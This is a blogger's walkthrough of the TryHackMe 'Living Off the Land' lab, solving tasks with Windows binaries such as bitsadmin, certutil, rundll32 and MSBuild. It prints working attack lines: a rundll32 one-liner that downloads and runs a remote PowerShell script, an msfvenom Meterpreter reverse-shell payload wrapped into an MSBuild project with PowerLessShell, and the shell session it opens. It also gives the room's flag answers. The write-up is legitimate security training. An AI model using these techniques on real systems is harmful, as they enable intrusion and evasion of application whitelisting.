Home Living Off the Land
Post
Cancel

Living Off the Land

Learn the essential concept of “Living Off the Land” in Red Team engagements.

THM Room https://tryhackme.com/room/livingofftheland

TASK 1 : Introduction

Deploy the provided machine and move on to the next task.

No Answer

TASK 2 : Windows Sysinternals

Read the above!

No Answer

TASK 3 : LOLBAS Project

Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?

Using LOLBAS project’s website search feature for the ATT&CK ID 1040 we can find the binary name associated :

T1040 T1040

Answer : Pktmon.exe

Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?

We can search for MSBuild.exe too :

MSBUILD.EXE MSBUILD.EXE

Answer : T1127.001

Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?

Execute Execute

Answer : Execute

In the next task, we will show some of the tools based on the functionalities! Let’s go!

No Answer.

TASK 4 : File Operations

Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?

First let’s create a test file on our attacking machine and start a python http server :

1
2
3
4
5
root@ip-10-10-141-93:~/Desktop# echo "hello" > test.txt
root@ip-10-10-141-93:~/Desktop# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.103.75 - - [10/Dec/2022 08:09:33] "GET /test.txt HTTP/1.1" 200 -
10.10.103.75 - - [10/Dec/2022 08:09:33] "GET /test.txt HTTP/1.1" 200 -

Now we can use bitsadmin.exe to download this file on our target machine :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
C:\Users\thm\Desktop> bitsadmin.exe /transfer /Download /priority Foreground http://10.10.141.93:8000/test.txt c:\Users\thm\Desktop\payload.txt

DISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED
PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 6 / 6 (100%)
Transfer complete.

C:\Users\thm\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\thm\Desktop

12/10/2022  08:23 AM    <DIR>          .
12/10/2022  08:23 AM    <DIR>          ..
12/10/2022  08:14 AM                66 encoded-test.txt
12/10/2022  08:23 AM                52 enc_thm_0YmFiOG_file.txt
12/10/2022  08:11 AM                 6 payload.txt
04/14/2022  12:40 PM               955 SysinternalsSuite.lnk
12/10/2022  08:09 AM                 6 test.txt
               5 File(s)          1,085 bytes
               2 Dir(s)  13,900,763,136 bytes free

Answer : enc_thm_0YmFiOG_file.txt

Use the certutil.exe tool to decode the encoded flag file from question #1. In order to decode the file, we use -decode option as follow:

What’s our encoded flag ?

1
2
C:\Users\thm\Desktop>type enc_thm_0YmFiOG_file.txt
VEhNe2VhNGUyYjlmMzYyMzIwZDA5ODYzNWQ0YmFiOGE1NjhlfQo=

Ok, we can use certutil -decode to get the orignal content of the file :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
C:\Users\thm\Desktop>certutil -decode
Expected at least 2 args, received 0
CertUtil: Missing argument

Usage:
  CertUtil [Options] -decode InFile OutFile
  Decode Base64-encoded file

Options:
  -f                -- Force overwrite
  -Unicode          -- Write redirected output in Unicode
  -gmt              -- Display times as GMT
  -seconds          -- Display times with seconds and milliseconds
  -v                -- Verbose operation
  -privatekey       -- Display password and private key data
  -pin PIN                  -- Smart Card PIN
  -sid WELL_KNOWN_SID_TYPE  -- Numeric SID
            22 -- Local System
            23 -- Local Service
            24 -- Network Service

CertUtil -?              -- Display a verb list (command list)
CertUtil -decode -?      -- Display help text for the "decode" verb
CertUtil -v -?           -- Display all help text for all verbs

We can give 2 parameters : the file to decode and the destination file to store the output.

1
2
3
4
5
6
C:\Users\thm\Desktop>certutil -decode enc_thm_0YmFiOG_file.txt output.txt
Input Length = 52
Output Length = 38
CertUtil: -decode command completed successfully.
C:\Users\thm\Desktop>type output.txt
THM{ea4e2b9f362320d098635d4bab8a568e}

Answer : THM{ea4e2b9f362320d098635d4bab8a568e}

TASK 5 : File Execution

Read the above and practice these tools on the attached machine!

Practicing wmic.exe, explorer.exe and rundll32.exe to open calc.exe works well.

I also tried to create an arbitrary file with the rundll32.exe method :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
root@ip-10-10-141-93:~/Desktop# cat script.ps1 
New-Item -Path "C:\Users\thm\Desktop\hello.txt"

C:\Users\thm\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\thm\Desktop

12/10/2022  08:34 AM    <DIR>          .
12/10/2022  08:34 AM    <DIR>          ..
12/10/2022  08:34 AM                 0 certutil
12/10/2022  08:14 AM                66 encoded-test.txt
12/10/2022  08:23 AM                52 enc_thm_0YmFiOG_file.txt
12/10/2022  08:32 AM                 0 out.txt
12/10/2022  08:33 AM                38 output.txt
12/10/2022  08:11 AM                 6 payload.txt
04/14/2022  12:40 PM               955 SysinternalsSuite.lnk
12/10/2022  08:09 AM                 6 test.txt
12/10/2022  08:34 AM                 0 typ
12/10/2022  08:34 AM                 0 type
              10 File(s)          1,123 bytes
               2 Dir(s)  13,964,197,888 bytes free

C:\Users\thm\Desktop>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.141.93:8000/script.ps1');");

C:\Users\thm\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\thm\Desktop

12/10/2022  09:28 AM    <DIR>          .
12/10/2022  09:28 AM    <DIR>          ..
12/10/2022  08:34 AM                 0 certutil
12/10/2022  08:14 AM                66 encoded-test.txt
12/10/2022  08:23 AM                52 enc_thm_0YmFiOG_file.txt
12/10/2022  09:28 AM                 0 hello.txt
12/10/2022  08:32 AM                 0 out.txt
12/10/2022  08:33 AM                38 output.txt
12/10/2022  08:11 AM                 6 payload.txt
04/14/2022  12:40 PM               955 SysinternalsSuite.lnk
12/10/2022  08:09 AM                 6 test.txt
12/10/2022  08:34 AM                 0 typ
12/10/2022  08:34 AM                 0 type
              11 File(s)          1,123 bytes
               2 Dir(s)  13,964,197,888 bytes free

No Answer.

TASK 6 : Application Whitelisting Bypasses

For more information about bypassing Windows security controls, we suggest checking the THM room: Bypassing UAC and Applocker once released!

Using signed bash.exe when linux subsystem feature is enable on windows 10 :

Calc.exe Calc.exe

No Answer.

TASK 7 : Other Techniques

eplicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?

First of all, we need to clone the git repository of PowerLessShell :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@ip-10-10-141-93:~/Desktop# git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
Cloning into 'PowerLessShell'...
remote: Enumerating objects: 368, done.
remote: Counting objects: 100% (45/45), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 368 (delta 25), reused 5 (delta 2), pack-reused 323
Receiving objects: 100% (368/368), 111.97 KiB | 1.15 MiB/s, done.
Resolving deltas: 100% (207/207), done.
root@ip-10-10-141-93:~/Desktop# ls
'Additional Tools'   live0fftheland.dll   mozo-made-15.desktop   PowerLessShell   script.ps1   test.txt   Tools
root@ip-10-10-141-93:~/Desktop# cd PowerLessShell/
root@ip-10-10-141-93:~/Desktop/PowerLessShell# ls
include  LICENSE.md  PowerLessShell.py  README.md  wmi_msbuild.cna
root@ip-10-10-141-93:~/Desktop/PowerLessShell

Then, we can create our payload with msfvenom and start a metasploit handler :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@ip-10-10-141-93:~/Desktop# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=10.10.141.93 LPORT=4444 -f psh-reflection > liv0ff.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 856 bytes
Final size of psh-reflection file: 3293 bytes

STARTING METASPLOIT HANDLER :

root@ip-10-10-141-93:~/Desktop# msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost 10.10.141.93;set lport 4444;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_winhttps
lhost => 10.10.141.93
lport => 4444
[*] Started HTTPS reverse handler on https://10.10.141.93:4444

The next step is to convert the payload to be compatible with MSBUILD tool :

1
2
3
4
5
6
7
8
9
10
11
root@ip-10-10-141-93:~/Desktop/PowerLessShell# ls
include  LICENSE.md  PowerLessShell.py  README.md  wmi_msbuild.cna
root@ip-10-10-141-93:~/Desktop/PowerLessShell# python2 PowerLessShell.py -type powershell -source ..//liv0ff.ps1 -output liv0ff.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-powershell.csproj as the template
File 'liv0ff.csproj' created
Process completed
root@ip-10-10-141-93:~/Desktop/PowerLessShell# ls
include  LICENSE.md  liv0ff.csproj  PowerLessShell.py  README.md  wmi_msbuild.cna

We can copy the file generated with one previous seen method on our target windows machine :

1
bitsadmin.exe /transfer /Download /priority Foreground http://10.10.141.93:8000/liv0ff.csproj c:\Users\thm\Desktop\liv0ff.csproj

Afterwards, we can try to build the payload with MSBUILD :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
C:\Users\thm\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\thm\Desktop

12/10/2022  10:41 AM    <DIR>          .
12/10/2022  10:41 AM    <DIR>          ..
12/10/2022  10:10 AM             1,621 calc.lnk
12/10/2022  08:34 AM                 0 certutil
12/10/2022  08:14 AM                66 encoded-test.txt
12/10/2022  10:41 AM                52 enc_thm_0YmFiOG_file.txt
12/10/2022  09:28 AM                 0 hello.txt
12/10/2022  10:39 AM            11,257 liv0ff.csproj
12/10/2022  08:32 AM                 0 out.txt
12/10/2022  10:09 AM               182 output.txt
12/10/2022  08:11 AM                 6 payload.txt
04/14/2022  12:40 PM               955 SysinternalsSuite.lnk
12/10/2022  08:09 AM                 6 test.txt
12/10/2022  08:34 AM                 0 typ
12/10/2022  08:34 AM                 0 type
              13 File(s)         14,145 bytes
               2 Dir(s)  13,957,087,232 bytes free

C:\Users\thm\Desktop>c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj
Microsoft (R) Build Engine version 4.8.3761.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 12/10/2022 10:42:32 AM.

We should receive a reverse shell in our metasploit handler :

1
2
3
4
5
6
7
8
9
10
root@ip-10-10-141-93:~/Desktop# msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost 10.10.141.93;set lport 4444;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_winhttps
lhost => 10.10.141.93
lport => 4444
[*] Started HTTPS reverse handler on https://10.10.141.93:4444
[*] https://10.10.141.93:4444 handling request from 10.10.103.75; (UUID: szvocozr) Staging x86 payload (177241 bytes) ...
[*] Meterpreter session 1 opened (10.10.141.93:4444 -> 10.10.103.75:50134) at 2022-12-10 10:43:02 +0000

meterpreter > 

Finally, we can search for our generated flag :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
meterpreter > shell
Process 5260 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\thm\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\thm\Desktop

12/10/2022  10:42 AM    <DIR>          .
12/10/2022  10:42 AM    <DIR>          ..
12/10/2022  10:10 AM             1,621 calc.lnk
12/10/2022  08:34 AM                 0 certutil
12/10/2022  08:14 AM                66 encoded-test.txt
12/10/2022  10:41 AM                52 enc_thm_0YmFiOG_file.txt
12/10/2022  10:43 AM                37 flag.txt
12/10/2022  09:28 AM                 0 hello.txt
12/10/2022  10:39 AM            11,257 liv0ff.csproj
12/10/2022  08:32 AM                 0 out.txt
12/10/2022  10:09 AM               182 output.txt
12/10/2022  08:11 AM                 6 payload.txt
04/14/2022  12:40 PM               955 SysinternalsSuite.lnk
12/10/2022  08:09 AM                 6 test.txt
12/10/2022  08:34 AM                 0 typ
12/10/2022  08:34 AM                 0 type
              14 File(s)         14,182 bytes
               2 Dir(s)  13,955,379,200 bytes free

C:\Users\thm\Desktop>type flag.txt
type flag.txt
THM{23005dc4369a0eef728aa39ff8cc3be2}

Answer : THM{23005dc4369a0eef728aa39ff8cc3be2}

TASK 8 : Real-life Scenario

Read the above!

No Answer.

TASK 9 : Conclusion

Good work and keep learning!

No Answer.

This post is licensed under CC BY 4.0 by the author.